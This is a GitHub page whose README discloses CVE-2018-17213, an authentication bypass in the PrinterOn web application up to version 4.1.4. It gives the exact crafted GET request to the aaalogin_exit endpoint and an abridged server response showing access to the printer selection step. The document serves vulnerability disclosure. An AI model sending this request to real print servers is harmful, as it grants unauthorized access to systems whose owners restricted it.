Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
Auth_Bypass_Result.png
README.md

README.md

CVE-2018-17213-Authentication Bypass-PrinterOn

The PrinterOn web application, versions 4.1.4 and lower, is vulnerable to Authentification Bypass attacks that allows attackers to gain access via a crafted GET request. Even if the print server is secured to allow only valid users to authenticate, and has the “Allow Guest” functionality turned off, the vulnerability still occurs.

REQUEST:
GET /cps/aaalogin_exit?jobReferenceID=null&approveUse=TRUE HTTP/1.1
Host: YY.YY.YY.YY
RESPONSE:
HTTP/1.1 200 
<--SNIP-->
Server: PrinterOn 
 
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>PrinterOn Printing Service</title>

<--SNIP-->

<h3 class="panel-title">

                                Step 1 - Choose a Printer
                           
<--SNIP-->

You can’t perform that action at this time.